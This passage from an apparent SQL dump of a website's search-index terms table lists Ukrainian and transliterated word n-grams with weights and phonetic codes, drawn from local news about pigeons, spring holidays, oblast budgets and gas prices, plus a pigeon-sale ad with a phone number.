budivnitstvo','pochinaetsya masove budivnitstvo',0,1,2,'P25325213153231',1,'*'),(1645359,'будівництво','будівництво',0,0,0.7333,'б000',1,'*'),(1645360,'будівництво гнізд','будівництво гнізд',0,1,1.5667,'б000',1,'*'),(1645361,'гнізд','гнізд',0,0,0.3333,'г000',1,'*'),(1645362,'масове','масове',0,0,0.4,'м000',1,'*'),(1645363,'масове будівництво','масове будівництво',0,1,1.6,'м000',1,'*'),(1645364,'масове будівництво гнізд','масове будівництво гнізд',0,1,1.8,'м000',1,'*'),(1645365,'починається','починається',0,0,0.7333,'п000',2,'*'),(1645366,'починається масове','починається масове',0,1,1.6,'п000',1,'*'),(1645367,'починається масове будівництво','починається масове будівництво',0,1,2,'п000',1,'*'),(1645380,'2505','2505',0,0,0.4,'',1,'*'),(1645381,'iz svyatom','iz svyatom',0,1,1.3333,'I2135',1,'*'),(1645382,'iz svyatom vesni','iz svyatom vesni',0,1,1.5333,'I2135125',1,'*'),(1645383,'krasi','krasi',0,0,0.3333,'K620',1,'*'),(1645384,'krasi ta','krasi ta',0,1,1.2667,'K623',1,'*'),(1645385,'krasi ta lyubovi','krasi ta lyubovi',0,1,1.5333,'K62341',1,'*'),(1645386,'lyubovi','lyubovi',0,0,0.4667,'L100',1,'*'),(1645387,'svyatom','svyatom',0,0,0.4667,'S135',1,'*'),(1645388,'svyatom vesni','svyatom vesni',0,1,1.4333,'S135125',1,'*'),(1645389,'svyatom vesni krasi','svyatom vesni krasi',0,1,1.6333,'S135125262',1,'*'),(1645390,'ta lyubovi','ta lyubovi',0,1,1.3333,'T410',1,'*'),(1645391,'vesni','vesni',0,0,0.3333,'V250',1,'*'),(1645392,'vesni krasi','vesni krasi',0,1,1.3667,'V25262',1,'*'),(1645393,'vesni krasi ta','vesni krasi ta',0,1,1.4667,'V252623',1,'*'),(1645394,'із святом','із святом',0,1,1.3,'і000',1,'*'),(1645395,'із святом весни','із святом весни',0,1,1.5,'і000',1,'*'),(1645396,'весни','весни',0,0,0.3333,'в000',1,'*'),(1645397,'весни краси','весни краси',0,1,1.3667,'в000',1,'*'),(1645398,'весни краси та','весни краси та',0,1,1.4667,'в000',1,'*'),(1645399,'краси','краси',0,0,0.3333,'к000',1,'*'),(1645400,'краси та','краси та',0,1,1.2667,'к000',1,'*'),(1645401,'краси та любові','краси та любові',0,1,1.5,'к000',1,'*'),(1645402,'святом','святом',0,0,0.4,'с000',1,'*'),(1645403,'святом весни','святом весни',0,1,1.4,'с000',1,'*'),(1645404,'святом весни краси','святом весни краси',0,1,1.6,'с000',1,'*'),(1645405,'та любові','та любові',0,1,1.3,'т000',1,'*'),(1645504,'10 dniv','10 dniv',0,1,1.2333,'D510',1,'*'),(1645505,'10 днів','10 днів',0,1,1.2333,'д000',1,'*'),(1645506,'10 днів 14','10 днів 14',0,1,1.3333,'д000',1,'*'),(1645507,'14 березня','14 березня',0,1,1.3333,'б000',1,'*'),(1645508,'14 березня і','14 березня і',0,1,1.4,'б000',1,'*'),(1645509,'2506','2506',0,0,0.4,'',1,'*'),(1645510,'dniv','dniv',0,0,0.2667,'D510',1,'*'),(1645511,'golubi projshlo','golubi projshlo',0,1,1.5,'G41624',1,'*'),(1645512,'golubi projshlo shche','golubi projshlo shche',0,1,1.7,'G416242',1,'*'),(1645513,'poshtovi golubi projshlo','poshtovi golubi projshlo',0,1,1.8,'P231241624',1,'*'),(1645514,'projshlo','projshlo',0,0,0.5333,'P624',1,'*'),(1645515,'projshlo shche','projshlo shche',0,1,1.4667,'P6242',1,'*'),(1645516,'projshlo shche 10','projshlo shche 10',0,1,1.5667,'P6242',1,'*'),(1645517,'shche','shche',0,0,0.3333,'S000',1,'*'),(1645518,'shche 10','shche 10',0,1,1.2667,'S000',1,'*'),(1645519,'shche 10 dniv','shche 10 dniv',0,1,1.4333,'S351',1,'*'),(1645520,'і перший','і перший',0,1,1.2667,'і000',1,'*'),(1645521,'і перший пробний','і перший пробний',0,1,1.5333,'і000',1,'*'),(1645522,'березня і','березня і',0,1,1.3,'б000',1,'*'),(1645523,'березня і перший','березня і перший',0,1,1.5333,'б000',1,'*'),(1645524,'голуби пройшло','голуби пройшло',0,1,1.4667,'г000',1,'*'),(1645525,'голуби пройшло ще','голуби пройшло ще',0,1,1.5667,'г000',1,'*'),(1645526,'днів 14','днів 14',0,1,1.2333,'д000',1,'*'),(1645527,'днів 14 березня','днів 14 березня',0,1,1.5,'д000',1,'*'),(1645528,'перший пробний','перший пробний',0,1,1.4667,'п000',1,'*'),(1645529,'перший пробний політ','перший пробний політ',0,1,1.6667,'п000',1,'*'),(1645530,'політ','політ',0,0,0.3333,'п000',1,'*'),(1645531,'поштові голуби пройшло','поштові голуби пройшло',0,1,1.7333,'п000',1,'*'),(1645532,'пробний','пробний',0,0,0.4667,'п000',1,'*'),(1645533,'пробний політ','пробний політ',0,1,1.4333,'п000',1,'*'),(1645534,'пройшло','пройшло',0,0,0.4667,'п000',1,'*'),(1645535,'пройшло ще','пройшло ще',0,1,1.3333,'п000',1,'*'),(1645536,'пройшло ще 10','пройшло ще 10',0,1,1.4333,'п000',1,'*'),(1645537,'ще 10','ще 10',0,1,1.1667,'щ000',1,'*'),(1645538,'ще 10 днів','ще 10 днів',0,1,1.3333,'щ000',1,'*'),(1645567,'2021 roku eksperiment','2021 roku eksperiment',0,1,1.7,'R21653',1,'*'),(1645568,'2021 roku pershij','2021 roku pershij',0,1,1.5667,'R2162',1,'*'),(1645569,'2021 року експеримент','2021 року експеримент',0,1,1.7,'р000',1,'*'),(1645570,'2021 року перший','2021 року перший',0,1,1.5333,'р000',1,'*'),(1645571,'21 bereznya','21 bereznya',0,1,1.3667,'B625',1,'*'),(1645572,'21 bereznya 2021','21 bereznya 2021',0,1,1.5333,'B625',1,'*'),(1645573,'21 березня','21 березня',0,1,1.3333,'б000',1,'*'),(1645574,'21 березня 2021','21 березня 2021',0,1,1.5,'б000',1,'*'),(1645575,'2507','2507',0,0,0.4,'',1,'*'),(1645576,'eksperiment','eksperiment',0,0,0.7333,'E21653',1,'*'),(1645577,'eksperiment vijshov','eksperiment vijshov',0,1,1.6333,'E21653121',1,'*'),(1645578,'eksperiment vijshov na','eksperiment vijshov na',0,1,1.7333,'E216531215',1,'*'),(1645579,'finishnu','finishnu',0,0,0.5333,'F525',1,'*'),(1645580,'finishnu pryamu','finishnu pryamu',0,1,1.5,'F525165',1,'*'),(1645581,'finishnu pryamu 21','finishnu pryamu 21',0,1,1.6,'F525165',1,'*'),(1645582,'na finishnu','na finishnu',0,1,1.3667,'N1525',1,'*'),(1645583,'na finishnu pryamu','na finishnu pryamu',0,1,1.6,'N1525165',1,'*'),(1645584,'pershij','pershij',0,0,0.4667,'P620',1,'*'),(1645585,'pershij samostijnij','pershij samostijnij',0,1,1.6333,'P62523252',1,'*'),(1645586,'pershij samostijnij snidanok','pershij samostijnij snidanok',0,1,1.9333,'P625232525352',1,'*'),(1645587,'pryamu','pryamu',0,0,0.4,'P650',1,'*'),(1645588,'pryamu 21','pryamu 21',0,1,1.3,'P650',1,'*'),(1645589,'pryamu 21 bereznya','pryamu 21 bereznya',0,1,1.6,'P651625',1,'*'),(1645590,'roku eksperiment','roku eksperiment',0,1,1.5333,'R21653',1,'*'),(1645591,'roku eksperiment vijshov','roku eksperiment vijshov',0,1,1.8,'R21653121',1,'*'),(1645592,'roku pershij','roku pershij',0,1,1.4,'R2162',1,'*'),(1645593,'roku pershij samostijnij','roku pershij samostijnij',0,1,1.8,'R2162523252',1,'*'),(1645594,'samostijnij','samostijnij',0,0,0.7333,'S523252',1,'*'),(1645595,'samostijnij snidanok','samostijnij snidanok',0,1,1.6667,'S5232525352',1,'*'),(1645596,'vijshov','vijshov',0,0,0.4667,'V210',1,'*'),(1645597,'vijshov na','vijshov na',0,1,1.3333,'V215',1,'*'),(1645598,'vijshov na finishnu','vijshov na finishnu',0,1,1.6333,'V2151525',1,'*'),(1645599,'вийшов','вийшов',0,0,0.4,'в000',1,'*'),(1645600,'вийшов на','вийшов на',0,1,1.3,'в000',1,'*'),(1645601,'вийшов на фінішну','вийшов на фінішну',0,1,1.5667,'в000',1,'*'),(1645602,'експеримент','експеримент',0,0,0.7333,'е000',1,'*'),(1645603,'експеримент вийшов','експеримент вийшов',0,1,1.6,'е000',1,'*'),(1645604,'експеримент вийшов на','експеримент вийшов на',0,1,1.7,'е000',1,'*'),(1645605,'на фінішну','на фінішну',0,1,1.3333,'н000',1,'*'),(1645606,'на фінішну пряму','на фінішну пряму',0,1,1.5333,'н000',1,'*'),(1645607,'перший самостійний','перший самостійний',0,1,1.6,'п000',1,'*'),(1645608,'перший самостійний сніданок','перший самостійний сніданок',0,1,1.9,'п000',1,'*'),(1645609,'пряму','пряму',0,0,0.3333,'п000',1,'*'),(1645610,'пряму 21','пряму 21',0,1,1.2667,'п000',1,'*'),(1645611,'пряму 21 березня','пряму 21 березня',0,1,1.5333,'п000',1,'*'),(1645612,'року експеримент','року експеримент',0,1,1.5333,'р000',1,'*'),(1645613,'року експеримент вийшов','року експеримент вийшов',0,1,1.7667,'р000',1,'*'),(1645614,'року перший','року перший',0,1,1.3667,'р000',1,'*'),(1645615,'року перший самостійний','року перший самостійний',0,1,1.7667,'р000',1,'*'),(1645616,'самостійний','самостійний',0,0,0.7333,'с000',1,'*'),(1645617,'самостійний сніданок','самостійний сніданок',0,1,1.6667,'с000',1,'*'),(1645618,'фінішну','фінішну',0,0,0.4667,'ф000',1,'*'),(1645619,'фінішну пряму','фінішну пряму',0,1,1.4333,'ф000',1,'*'),(1645620,'фінішну пряму 21','фінішну пряму 21',0,1,1.5333,'ф000',1,'*'),(1646492,'2 2508','2 2508',0,1,1.2,'',1,'*'),(1646493,'2 2508 vikonannya','2 2508 vikonannya',0,1,1.5667,'V250',1,'*'),(1646494,'2 misyatsi','2 misyatsi',0,1,1.3333,'M232',1,'*'),(1646495,'2 misyatsi 2021','2 misyatsi 2021',0,1,1.5,'M232',1,'*'),(1646496,'2508','2508',0,0,0.4,'',1,'*'),(1646497,'2508 vikonannya','2508 vikonannya',0,1,1.5,'V250',1,'*'),(1646498,'2508 vikonannya dokhidnoji','2508 vikonannya dokhidnoji',0,1,1.8667,'V2532352',1,'*'),(1646499,'3 місяці','3 місяці',0,1,1.2667,'м000',1,'*'),(1646500,'3 місяці 2021','3 місяці 2021',0,1,1.4333,'м000',1,'*'),(1646501,'8 novini','8 novini',0,1,1.2667,'N150',18,'*'),(1646502,'8 novini 2','8 novini 2',0,1,1.3333,'N150',18,'*'),(1646503,'byudzhetiv otg','byudzhetiv otg',0,1,1.4667,'B323132',4,'*'),(1646504,'byudzhetiv otg zhitomirskoji','byudzhetiv otg zhitomirskoji',0,1,1.9333,'B3231323562',4,'*'),(1646505,'chastini byudzhetiv otg','chastini byudzhetiv otg',0,1,1.7667,'C351323132',4,'*'),(1646506,'misyatsi','misyatsi',0,0,0.5333,'M232',1,'*'),(1646507,'misyatsi 2021','misyatsi 2021',0,1,1.4333,'M232',1,'*'),(1646508,'misyatsi 2021 roku','misyatsi 2021 roku',0,1,1.6,'M23262',1,'*'),(1646509,'novini 2 2508','novini 2 2508',0,1,1.4333,'N150',1,'*'),(1646510,'oblasti za','oblasti za',0,1,1.3333,'O14232',4,'*'),(1646511,'oblasti za 2','oblasti za 2',0,1,1.4,'O14232',1,'*'),(1646512,'otg zhitomirskoji','otg zhitomirskoji',0,1,1.5667,'O323562',4,'*'),(1646513,'otg zhitomirskoji oblasti','otg zhitomirskoji oblasti',0,1,1.8333,'O3235621423',4,'*'),(1646514,'za 2','za 2',0,1,1.1333,'Z000',1,'*'),(1646515,'za 2 misyatsi','za 2 misyatsi',0,1,1.4333,'Z5232',1,'*'),(1646516,'zhitomirskoji oblasti za','zhitomirskoji oblasti za',0,1,1.8,'Z356214232',4,'*'),(1646517,'департаменту фінансів житмирської','департаменту фінансів житмирської',0,1,2,'д000',1,'*'),(1646518,'житмирської','житмирської',0,0,0.7333,'ж000',1,'*'),(1646519,'житмирської ода','житмирської ода',0,1,1.5,'ж000',1,'*'),(1646520,'за 3','за 3',0,1,1.1333,'з000',1,'*'),(1646521,'за 3 місяці','за 3 місяці',0,1,1.3667,'з000',1,'*'),(1646522,'місяці 2021','місяці 2021',0,1,1.3667,'м000',1,'*'),(1646523,'місяці 2021 року','місяці 2021 року',0,1,1.5333,'м000',1,'*'),(1646524,'результати за','результати за',0,1,1.4333,'р000',1,'*'),(1646525,'результати за 3','результати за 3',0,1,1.5,'р000',1,'*'),(1646526,'фінансів житмирської','фінансів житмирської',0,1,1.6667,'ф000',1,'*'),(1646527,'фінансів житмирської ода','фінансів житмирської ода',0,1,1.8,'ф000',1,'*'),(1646570,'2019 року або','2019 року або',0,1,1.4333,'р000',1,'*'),(1646571,'2517','2517',0,0,0.4,'',1,'*'),(1646572,'2517 golub','2517 golub',0,1,1.3333,'G410',1,'*'),(1646573,'2517 golub king','2517 golub king',0,1,1.5,'G41252',1,'*'),(1646574,'golub king','golub king',0,1,1.3333,'G41252',1,'*'),(1646575,'holuby','holuby',0,0,0.4,'H410',12,'*'),(1646576,'holuby kinhy','holuby kinhy',0,1,1.4,'H4125',3,'*'),(1646577,'holuby kinhy 2517','holuby kinhy 2517',0,1,1.5667,'H4125',1,'*'),(1646578,'king','king',0,0,0.2667,'K520',2,'*'),(1646579,'kinhy','kinhy',0,0,0.3333,'K500',3,'*'),(1646580,'kinhy 2517','kinhy 2517',0,1,1.3333,'K500',1,'*'),(1646581,'kinhy 2517 golub','kinhy 2517 golub',0,1,1.5333,'K5241',1,'*'),(1646582,'або обмін','або обмін',0,1,1.3,'а000',1,'*'),(1646583,'або обмін на','або обмін на',0,1,1.4,'а000',1,'*'),(1646584,'вінницю овруч дзвоніть','вінницю овруч дзвоніть',0,1,1.7333,'в000',3,'*'),(1646585,'голуб кінг','голуб кінг',0,1,1.3333,'г000',1,'*'),(1646586,'дзвоніть домовимось','дзвоніть домовимось',0,1,1.6333,'д000',2,'*'),(1646587,'дзвоніть домовимось тел','дзвоніть домовимось тел',0,1,1.7667,'д000',1,'*'),(1646588,'домовимось тел','домовимось тел',0,1,1.4667,'д000',1,'*'),(1646589,'домовимось тел viber','домовимось тел viber',0,1,1.6667,'д160',1,'*'),(1646590,'житомир радомишль','житомир радомишль',0,1,1.5667,'ж000',3,'*'),(1646591,'житомир радомишль коростишів','житомир радомишль коростишів',0,1,1.9333,'ж000',3,'*'),(1646592,'кінг','кінг',0,0,0.2667,'к000',2,'*'),(1646593,'київ житомир радомишль','київ житомир радомишль',0,1,1.7333,'к000',3,'*'),(1646594,'коричневого','коричневого',0,0,0.7333,'к000',1,'*'),(1646595,'коричневого самця','коричневого самця',0,1,1.5667,'к000',1,'*'),(1646596,'коричневого самця 2019','коричневого самця 2019',0,1,1.7333,'к000',1,'*'),(1646597,'коростишів','коростишів',0,0,0.6667,'к000',3,'*'),(1646598,'коростишів бердичів','коростишів бердичів',0,1,1.6333,'к000',3,'*'),(1646599,'коростишів бердичів вінницю','коростишів бердичів вінницю',0,1,1.9,'к000',3,'*'),(1646600,'на самку','на самку',0,1,1.2667,'н000',1,'*'),(1646601,'на самку є','на самку є',0,1,1.3333,'н000',1,'*'),(1646602,'обмін на','обмін на',0,1,1.2667,'о000',1,'*'),(1646603,'обмін на самку','обмін на самку',0,1,1.4667,'о000',1,'*'),(1646604,'овруч дзвоніть','овруч дзвоніть',0,1,1.4667,'о000',3,'*'),(1646605,'овруч дзвоніть домовимось','овруч дзвоніть домовимось',0,1,1.8333,'о000',2,'*'),(1646606,'пропоную','пропоную',0,0,0.5333,'п000',2,'*'),(1646607,'пропоную коричневого','пропоную коричневого',0,1,1.6667,'п000',1,'*'),(1646608,'пропоную коричневого самця','пропоную коричневого самця',0,1,1.8667,'п000',1,'*'),(1646609,'радомишль','радомишль',0,0,0.6,'р000',3,'*'),(1646610,'радомишль коростишів','радомишль коростишів',0,1,1.6667,'р000',3,'*'),(1646611,'радомишль коростишів бердичів','радомишль коростишів бердичів',0,1,1.9667,'р000',3,'*'),(1646612,'року або','року або',0,1,1.2667,'р000',1,'*'),(1646613,'року або обмін','року або обмін',0,1,1.4667,'р000',1,'*'),(1646614,'самку','самку',0,0,0.3333,'с000',1,'*'),(1646615,'самку є','самку є',0,1,1.2333,'с000',1,'*'),(1646616,'самку є можливість','самку є можливість',0,1,1.6,'с000',1,'*'),(1646617,'самця','самця',0,0,0.3333,'с000',1,'*'),(1646618,'самця 2019','самця 2019',0,1,1.3333,'с000',1,'*'),(1646619,'самця 2019 року','самця 2019 року',0,1,1.5,'с000',1,'*'),(1646620,'тел','тел',0,0,0.2,'т000',1,'*'),(1646621,'тел viber','тел viber',0,1,1.3,'т160',1,'*'),(1646622,'тел viber 0508320922','тел viber 0508320922',0,1,1.6667,'т160',1,'*'),(1646850,'2518','2518',0,0,0.4,'',1,'*'),(1646851,'2518 king','2518 king',0,1,1.3,'K520',1,'*'),(1646852,'2518 king samochka','2518 king samochka',0,1,1.6,'K5252',1,'*'),(1646853,'holuby kinhy 2518','holuby kinhy 2518',0,1,1.5667,'H4125',1,'*'),(1646854,'king samochka','king samochka',0,1,1.4333,'K5252',1,'*'),(1646855,'king samochka osinnya','king samochka osinnya',0,1,1.7,'K52525',1,'*'),(1646856,'kinhy 2518','kinhy 2518',0,1,1.3333,'K500',1,'*'),(1646857,'kinhy 2518 king','kinhy 2518 king',0,1,1.5,'K5252',1,'*'),(1646858,'osinnya','osinnya',0,0,0.4667,'O250',1,'*'),(1646859,'samochka','samochka',0,0,0.5333,'S520',1,'*'),(1646860,'samochka osinnya','samochka osinnya',0,1,1.5333,'S525',1,'*'),(1646861,'дзвоніть домовимось 0508320922','дзвоніть домовимось 0508320922',0,1,2,'д000',1,'*'),(1646862,'домовимось 0508320922','домовимось 0508320922',0,1,1.7,'д000',1,'*'),(1646863,'кінг самочка','кінг самочка',0,1,1.4,'к000',1,'*'),(1646864,'кінг самочка осіння','кінг самочка осіння',0,1,1.6333,'к000',1,'*'),(1646865,'кінга осінню','кінга осінню',0,1,1.4,'к000',1,'*'),(1646866,'кінга осінню є','кінга осінню є',0,1,1.4667,'к000',1,'*'),(1646867,'осінню є','осінню є',0,1,1.2667,'о000',1,'*'),(1646868,'осінню є можливість','осінню є можливість',0,1,1.6333,'о000',1,'*'),(1646869,'осіння','осіння',0,0,0.4,'о000',1,'*'),(1646870,'пропоную самочку','пропоную самочку',0,1,1.5333,'п000',1,'*'),(1646871,'пропоную самочку кінга','пропоную самочку кінга',0,1,1.7333,'п000',1,'*'),(1646872,'самочка','самочка',0,0,0.4667,'с000',2,'*'),(1646873,'самочка осіння','самочка осіння',0,1,1.4667,'с000',1,'*'),(1646874,'самочку','самочку',0,0,0.4667,'с000',1,'*'),(1646875,'самочку кінга','самочку кінга',0,1,1.4333,'с000',1,'*'),(1646876,'самочку кінга осінню','самочку кінга осінню',0,1,1.6667,'с000',1,'*'),(1646912,'12 грн','12 грн',0,1,1.2,'г000',1,'*'),(1646913,'12 грн за','12 грн за',0,1,1.3,'г000',1,'*'),(1646914,'13,50','13,50',0,0,0.5,'',1,'*'),(1646915,'13,50 грн','13,50 грн',0,1,1.3,'г000',1,'*'),(1646916,'13,50 грн за','13,50 грн за',0,1,1.4,'г000',1,'*'),(1646917,'2 2519','2 2519',0,1,1.2,'',1,'*'),(1646918,'2 2519 richna','2 2519 richna',0,1,1.4333,'R250',1,'*'),(1646919,'25,9','25,9',0,0,0.4,'',1,'*'),(1646920,'25,9 євро','25,9 євро',0,1,1.3,'є000',1,'*'),(1646921,'25,9 євро мвт-год','25,9 євро мвт-год',0,1,1.5667,'є000',1,'*'),(1646922,'2519','2519',0,0,0.4,'',1,'*'),(1646923,'2519 richna','2519 richna',0,1,1.3667,'R250',1,'*'),(1646924,'2519 richna fiksovana','2519 richna fiksovana',0,1,1.7,'R251215',1,'*'),(1646925,'270','270',0,0,0.3,'',1,'*'),(1646926,'270 за','270 за',0,1,1.2,'з000',1,'*'),(1646927,'270 за тисячу','270 за тисячу',0,1,1.4333,'з000',1,'*'),(1646928,'7,80','7,80',0,0,0.4,'',1,'*'),(1646929,'7,80 грн','7,80 грн',0,1,1.2667,'г000',1,'*'),(1646930,'7,80 грн до','7,80 грн до',0,1,1.3667,'г000',1,'*'),(1646931,'7,96','7,96',0,0,0.4,'',1,'*'),(1646932,'7,96 грн','7,96 грн',0,1,1.2667,'г000',1,'*'),(1646933,'7,96 грн за','7,96 грн за',0,1,1.3667,'г000',1,'*'),(1646934,'com ua novyny','com ua novyny',0,1,1.4333,'C515',1,'*'),(1646935,'fiksovana','fiksovana',0,0,0.6,'F215',1,'*'),(1646936,'fiksovana tsina','fiksovana tsina',0,1,1.5,'F215325',1,'*'),(1646937,'fiksovana tsina na','fiksovana tsina na',0,1,1.6,'F215325',1,'*'),(1646938,'gaz uzhe','gaz uzhe',0,1,1.2667,'G000',1,'*'),(1646939,'gaz uzhe vipravdovue','gaz uzhe vipravdovue',0,1,1.6667,'G16131',1,'*'),(1646940,'na gaz','na gaz',0,1,1.2,'N200',1,'*'),(1646941,'na gaz uzhe','na gaz uzhe',0,1,1.3667,'N200',1,'*'),(1646942,'novini 2 2519','novini 2 2519',0,1,1.4333,'N150',1,'*'),(1646943,'novyny','novyny',0,0,0.4,'N150',1,'*'),(1646944,'novyny vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizh','novyny vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizh',0,1,2,'N151365215361232452164354212',1,'*'),(1646945,'richna','richna',0,0,0.4,'R250',1,'*'),(1646946,'richna fiksovana','richna fiksovana',0,1,1.5333,'R251215',1,'*'),(1646947,'richna fiksovana tsina','richna fiksovana tsina',0,1,1.7333,'R251215325',1,'*'),(1646948,'sebe','sebe',0,0,0.2667,'S100',1,'*'),(1646949,'tsina','tsina',0,0,0.3333,'T250',1,'*'),(1646950,'tsina na','tsina na',0,1,1.2667,'T250',1,'*'),(1646951,'tsina na gaz','tsina na gaz',0,1,1.4,'T252',1,'*'),(1646952,'ua novyny','ua novyny',0,1,1.3,'U515',1,'*'),(1646953,'ua novyny vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-sv','ua novyny vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-sv',0,1,2,'U515136521536123245216435421',1,'*'),(1646954,'uzhe','uzhe',0,0,0.2667,'U200',1,'*'),(1646955,'uzhe vipravdovue','uzhe vipravdovue',0,1,1.5333,'U216131',1,'*'),(1646956,'uzhe vipravdovue sebe','uzhe vipravdovue sebe',0,1,1.7,'U21613121',1,'*'),(1646957,'vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinn','vid-7-80-i-do-13-50-hrn-za-kubometr-postachalnyky-opryliudnyly-svizhi-tsinn',0,0,1,'V365215361232452164354212325',1,'*'),(1646958,'vipravdovue','vipravdovue',0,0,0.7333,'V6131',1,'*'),(1646959,'vipravdovue sebe','vipravdovue sebe',0,1,1.5333,'V613121',1,'*'),(1646960,'«місячний»','«місячний»',0,0,0.6667,'м000',1,'*'),(1646961,'«місячний» відбувається','«місячний» відбувається',0,1,1.7667,'м000',1,'*'),(1646962,'«місячний» відбувається лише','«місячний» відбувається лише',0,1,1.9333,'м000',1,'*'),(1646963,'євро','євро',0,0,0.2667,'є000',1,'*'),(1646964,'євро мвт-год','євро мвт-год',0,1,1.4,'є000',1,'*'),(1646965,'євро мвт-год що','євро мвт-год що',0,1,1.5,'є000',1,'*'),(1646966,'європі','європі',0,0,0.4,'є000',1,'*'),(1646967,'європі лише','європі лише',0,1,1.3667,'є000',1,'*'),(1646968,'європі лише дорожчає','європі лише дорожчає',0,1,1.6667,'є000',1,'*'),(1646969,'європі на','європі на',0,1,1.3,'є000',1,'*'),(1646970,'європі на початок','європі на початок',0,1,1.5667,'є000',1,'*'),(1646971,'європейських','європейських',0,0,0.8,'є000',1,'*'),(1646972,'європейських хабах','європейських хабах',0,1,1.6,'є000',1,'*'),(1646973,'європейських хабах і','європейських хабах і',0,1,1.6667,'є000',1,'*'),(1646974,'європейському','європейському',0,0,0.8667,'є000',1,'*'),(1646975,'європейському ринку','європейському ринку',0,1,1.6333,'є000',1,'*'),(1646976,'європейському ринку обмежуючи','європейському ринку обмежуючи',0,1,1.9667,'є000',1,'*'),(1646977,'і не','і не',0,1,1.1333,'і000',2,'*'),(1646978,'і не змінюється','і не змінюється',0,1,1.5,'і000',1,'*'),(1646979,'і сезонних','і сезонних',0,1,1.3333,'і000',1,'*'),(1646980,'і сезонних коливань','і сезонних коливань',0,1,1.6333,'і000',1,'*'),(1646981,'із рівними','із рівними',0,1,1.3333,'і000',1,'*'),(1646982,'із рівними помісячними','із рівними помісячними',0,1,1.7333,'і000',1,'*'),(1646983,'а також російський','а також російський',0,1,1.6,'а000',1,'*'),(1646984,'аби споживачі','аби споживачі',0,1,1.4333,'а000',1,'*'),(1646985,'аби споживачі могли','аби споживачі могли',0,1,1.6333,'а000',1,'*'),(1646986,'адже як','адже як',0,1,1.2333,'а000',1,'*'),(1646987,'адже як базова','адже як базова',0,1,1.4667,'а000',1,'*'),(1646988,'але вже','але вже',0,1,1.2333,'а000',1,'*'),(1646989,'але вже в','але вже в',0,1,1.3,'а000',1,'*'),(1646990,'альтернативні','альтернативні',0,0,0.8667,'а000',1,'*'),(1646991,'альтернативні річні','альтернативні річні',0,1,1.6333,'а000',1,'*'),(1646992,'альтернативні річні продукти','альтернативні річні продукти',0,1,1.9333,'а000',1,'*'),(1646993,'більшість компаній','більшість компаній',0,1,1.6,'б000',1,'*'),(1646994,'більшість компаній обіцяють','більшість компаній обіцяють',0,1,1.9,'б000',1,'*'),(1646995,'більше за','більше за',0,1,1.3,'б000',1,'*'),(1646996,'більше за 270','більше за 270',0,1,1.4333,'б000',1,'*'),(1646997,'бажанням','бажанням',0,0,0.5333,'б000',1,'*'),(1646998,'бажанням клієнта','бажанням клієнта',0,1,1.5333,'б000',1,'*'),(1646999,'бажанням клієнта у','бажанням клієнта у',0,1,1.6,'б000',1,'*'),(1647000,'базова','базова',0,0,0.4,'б000',1,'*'),(1647001,'базова діє','базова діє',0,1,1.3333,'б000',1,'*'),(1647002,'базова діє річна','базова діє річна',0,1,1.5333,'б000',1,'*'),(1647003,'базова річна','базова річна',0,1,1.4,'б000',1,'*'),(1647004,'базова річна ціна','базова річна ціна',0,1,1.5667,'б000',1,'*'),(1647005,'базових','базових',0,0,0.4667,'б000',1,'*'),(1647006,'базових пропозиціях','базових пропозиціях',0,1,1.6333,'б000',1,'*'),(1647007,'базових пропозиціях але','базових пропозиціях але',0,1,1.7667,'б000',1,'*'),(1647008,'в липні','в липні',0,1,1.2333,'в000',1,'*'),(1647009,'в липні більшість','в липні більшість',0,1,1.5667,'в000',1,'*'),(1647010,'в майже','в майже',0,1,1.2333,'в000',1,'*'),(1647011,'в майже 12','в майже 12',0,1,1.3333,'в000',1,'*'),(1647012,'в огляді','в огляді',0,1,1.2667,'в000',1,'*'),(1647013,'в огляді газправди','в огляді газправди',0,1,1.6,'в000',1,'*'),(1647014,'в сховищах','в сховищах',0,1,1.3333,'в000',1,'*'),(1647015,'в сховищах а','в сховищах а',0,1,1.4,'в000',1,'*'),(1647016,'в червні','в червні',0,1,1.2667,'в000',1,'*'),(1647017,'в червні сягає','в червні сягає',0,1,1.4667,'в000',1,'*'),(1647018,'від 7,80','від 7,80',0,1,1.2667,'в000',1,'*'),(1647019,'від 7,80 грн','від 7,80 грн',0,1,1.4,'в000',1,'*'),(1647020,'відбувається лише','відбувається лише',0,1,1.5667,'в000',1,'*'),(1647021,'відбувається лише за','відбувається лише за',0,1,1.6667,'в000',1,'*'),(1647022,'варіант https','варіант https',0,1,1.4333,'в312',1,'*'),(1647023,'варіант https gazpravda','варіант https gazpravda',0,1,1.7667,'в3121613',1,'*'),(1647024,'вже в','вже в',0,1,1.1667,'в000',1,'*'),(1647025,'вже в липні','вже в липні',0,1,1.3667,'в000',1,'*'),(1647026,'вже чекає','вже чекає',0,1,1.3,'в000',1,'*'),(1647027,'вже чекає на','вже чекає на',0,1,1.4,'в000',1,'*'),(1647028,'вигідно','вигідно',0,0,0.4667,'в000',1,'*'),(1647029,'вигідно залишатися','вигідно залишатися',0,1,1.6,'в000',1,'*'),(1647030,'вигідно залишатися нарічних','вигідно залишатися нарічних',0,1,1.9,'в000',1,'*'),(1647031,'випадку','випадку',0,0,0.4667,'в000',1,'*'),(1647032,'випадку споживачам','випадку споживачам',0,1,1.6,'в000',1,'*'),(1647033,'випадку споживачам справді','випадку споживачам справді',0,1,1.8667,'в000',1,'*'),(1647034,'виправдовує','виправдовує',0,0,0.7333,'в000',1,'*'),(1647035,'виправдовує себе','виправдовує себе',0,1,1.5333,'в000',1,'*'),(1647036,'вона','вона',0,0,0.2667,'в000',1,'*'),(1647037,'вона складає','вона складає',0,1,1.4,'в000',1,'*'),(1647038,'вона складає 7,96','вона складає 7,96',0,1,1.5667,'в000',1,'*'),(1647039,'впливають','впливають',0,0,0.6,'в000',1,'*'),(1647040,'впливають пожвавлення','впливають пожвавлення',0,1,1.7,'в000',1,'*'),(1647041,'впливають пожвавлення економіки','впливають пожвавлення економіки',0,1,2,'в000',1,'*'),(1647042,'газ у','газ у',0,1,1.1667,'г000',1,'*'),(1647043,'газ у європі','газ у європі',0,1,1.4,'г000',1,'*'),(1647044,'газ уже','газ уже',0,1,1.2333,'г000',1,'*'),(1647045,'газ уже виправдовує','газ уже 